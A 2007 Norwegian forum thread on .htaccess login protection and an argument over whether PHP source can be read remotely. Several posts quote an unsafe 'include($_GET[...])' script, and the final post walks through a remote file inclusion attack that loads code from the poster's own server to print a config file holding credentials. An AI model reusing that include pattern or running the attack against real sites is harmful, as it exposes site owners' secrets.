Equerm Skrevet 15. januar 2007 Skrevet 15. januar 2007 Huff... jeg gir opp... Apache er webserveren som blir brukt for internettsider, tror ikke home.no kjører IIS Si meg, tror du det bare finnes to webserver software i verden? Hva med Jetty, TUX webserver, Yaws og Nhttpd (For å nevene noen..) 7725753[/snapback] Ok, jeg er klar over at det finnes flere, men jeg er ganske ganske sikker på at home.no bruker en av de 2 som er vanligst å bruke, enten Apache eller IIS
Equerm Skrevet 15. januar 2007 Skrevet 15. januar 2007 Si meg, på en skala fra 1 til 10, hvor dum er du? Ikke under noen omstendigheter kan du hente ut kilden til en php fil på en annen server.. Den eneste måten er om filen heter filnavn.phps eller om filen heter noe annet en .php og apache ikke er kofigurert til å definere dette som en php fil.. Det du sier om "usikkert include" script.. La oss si at scriptet ser slik ut <?php if(!file_exists($_GET['side'])) { include("error.php"); } else { include($_GET['side']); } ?> (Dette er forresten den vanligste feilen blant nybegynnere) Om du skriver i adressefeltet index.php?side=enannenside.php Så får du kun opp det som siden printer ut, ikke kildekoden til php'en... Så jeg sier igjen (Ikke for å være altfor streng ), Hvor dum er du? 7725734[/snapback] Jeg sa ikke noe om at man får opp kildekoden til filen med å bruke det der, det er jeg fullt klar over, men det er mulig å laste ned filene for så å sjekke kildekoden Jeg kan ivertfall si at jeg er minst 1 hakk mindre dum enn deg
Stian Jacobsen Skrevet 15. januar 2007 Skrevet 15. januar 2007 Si meg, på en skala fra 1 til 10, hvor dum er du? Ikke under noen omstendigheter kan du hente ut kilden til en php fil på en annen server.. Den eneste måten er om filen heter filnavn.phps eller om filen heter noe annet en .php og apache ikke er kofigurert til å definere dette som en php fil.. Det du sier om "usikkert include" script.. La oss si at scriptet ser slik ut <?php if(!file_exists($_GET['side'])) { include("error.php"); } else { include($_GET['side']); } ?> (Dette er forresten den vanligste feilen blant nybegynnere) Om du skriver i adressefeltet index.php?side=enannenside.php Så får du kun opp det som siden printer ut, ikke kildekoden til php'en... Så jeg sier igjen (Ikke for å være altfor streng ), Hvor dum er du? 7725734[/snapback] Jeg sa ikke noe om at man får opp kildekoden til filen med å bruke det der, det er jeg fullt klar over, men det er mulig å laste ned filene for så å sjekke kildekoden Jeg kan ivertfall si at jeg er minst 1 hakk mindre dum enn deg 7725815[/snapback] Nei, du kan ikke laste ned kildekoden til en php fil. Da må du isåfall ha FTP tilgang til den serveren filen ligger. Eller som jeg sa, at filen heter noe annet en ".php" og apache eller anndre webservere ikke er konfigurert til å gjenkjenne filtypen som en php-fil.
Equerm Skrevet 15. januar 2007 Skrevet 15. januar 2007 Du kan kjøre en fil på servern som lager et zip arkiv av f.eks en mappe, så kan du laste ned den mappen...
Stian Jacobsen Skrevet 15. januar 2007 Skrevet 15. januar 2007 hva med http://no2.php.net/showsource 7727007[/snapback] Dette blir det samme som .phps
Stian Jacobsen Skrevet 15. januar 2007 Skrevet 15. januar 2007 Du kan kjøre en fil på servern som lager et zip arkiv av f.eks en mappe, så kan du laste ned den mappen... 7726474[/snapback] Det var da ikke dette tråden begynte med. Du påsto at med et lite sikkert include script, kunne du se kilden til en php fil..
Ståle Skrevet 15. januar 2007 Skrevet 15. januar 2007 (endret) Du kan kjøre en fil på servern som lager et zip arkiv av f.eks en mappe, så kan du laste ned den mappen... 7726474[/snapback] Det var da ikke dette tråden begynte med. Du påsto at med et lite sikkert include script, kunne du se kilden til en php fil.. 7727501[/snapback] ! ! ! <-- Edit; tre utropstegn include($_GET['side']); FARLIG_FFS.php <-- PHP side <?php show_source($_GET['hemmeligside']); ?> :o Endret 15. januar 2007 av Ståle
Equerm Skrevet 15. januar 2007 Skrevet 15. januar 2007 Det var da ikke dette tråden begynte med. Du påsto at med et lite sikkert include script, kunne du se kilden til en php fil.. 7727501[/snapback] Denne metoden jeg beskriver kan man bruke via et usikkert include script
Anders Moen Skrevet 15. januar 2007 Skrevet 15. januar 2007 Begynner kanskje å gå litt off topic nå? Jeg venter fortsatt på en logg inn kode (.htaccess),som faktisk fungerer
Equerm Skrevet 15. januar 2007 Skrevet 15. januar 2007 Begynner kanskje å gå litt off topic nå? Jeg venter fortsatt på en logg inn kode (.htaccess),som faktisk fungerer 7729139[/snapback] Beklager, jeg skal holde kjeft, gidder ikke å diskutere dette lenger uansett
Anders Moen Skrevet 15. januar 2007 Skrevet 15. januar 2007 (endret) Hahah okay! Uansett så lastet jeg ned XAMPP nå, for å få en egen server, hvor det lå .htaccess og .htpasswd som faktisk fungerer Når jeg prater om det, ingen som vet hvordan jeg kan gjøre sånn at dere kan gå til http://ip_adressa_mi? Endret 15. januar 2007 av Andy-Pandy
Equerm Skrevet 15. januar 2007 Skrevet 15. januar 2007 https://www.diskusjon.no/index.php?showtopic=587769 Denne hjelper deg kanskje litt?
Wooho Skrevet 17. januar 2007 Forfatter Skrevet 17. januar 2007 At noe så lett skulle bli så vanskeligt. Fikk opprettet et webområde hos hotserv.dk og endelig funker .htaccess Takker folkens!
Anders Moen Skrevet 17. januar 2007 Skrevet 17. januar 2007 At noe så lett skulle bli så vanskeligt. Fikk opprettet et webområde hos hotserv.dk og endelig funker .htaccess Takker folkens! 7742271[/snapback] Grattis Jeg bruker også Hotserv.dk, men serveren er for vedlikehold for tida så den er nede en del for tida.
trrunde Skrevet 17. januar 2007 Skrevet 17. januar 2007 Hahah okay!Uansett så lastet jeg ned XAMPP nå, for å få en egen server, hvor det lå .htaccess og .htpasswd som faktisk fungerer Når jeg prater om det, ingen som vet hvordan jeg kan gjøre sånn at dere kan gå til http://ip_adressa_mi? 7729393[/snapback] Du må åpne porter i ruteren din og redirecte trafikken på port 80 til din pc
Anders Moen Skrevet 17. januar 2007 Skrevet 17. januar 2007 Du må åpne porter i ruteren din og redirecte trafikken på port 80 til din pc 7743028[/snapback] Og hvordan gjør jeg dette om jeg tør spørre? Forresten, ta det på personlig melding, eller legg meg til på MSN (hvis du har), mailen min er [email protected]
ZoRaC Skrevet 19. januar 2007 Skrevet 19. januar 2007 (endret) Ikke for å "kapre" tråden, men må bare oppklare det der med "det er ikke mulig så se kilden til PHP-filer" diskusjonen. Eksempel: www.dinserver.no <--- din hjemmeside ligger her www.minserver.no <--- min hjemmeside ligger her Du har f.eks denne (http://dinserver.no/config.php): <?php $user = "brukernavn; $pass = "passord"; ?> Åpner du http://dinserver.no/config.php får du bare en blank side - greit nok. I filen dinserver.no/index.php: <?php include($_GET['fil']); ?> I minserver.no/hacker.txt: <?php highlight_file($_GET['viskilde']); ?> Så kjører jeg bare: www.dinserver.no?fil=http://www.minserver.no/hack.php&viskilde=config.php Og vips, så vises kilden til config.php (hvis safe_mode=off og allow_url_fopen=on, noe den er hos de fleste) Å kalle noen for "dum" synes jeg er drøyt, særlig når den som kommer med kommentaren tar fullstendig feil! Endret 19. januar 2007 av ZoRaC
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå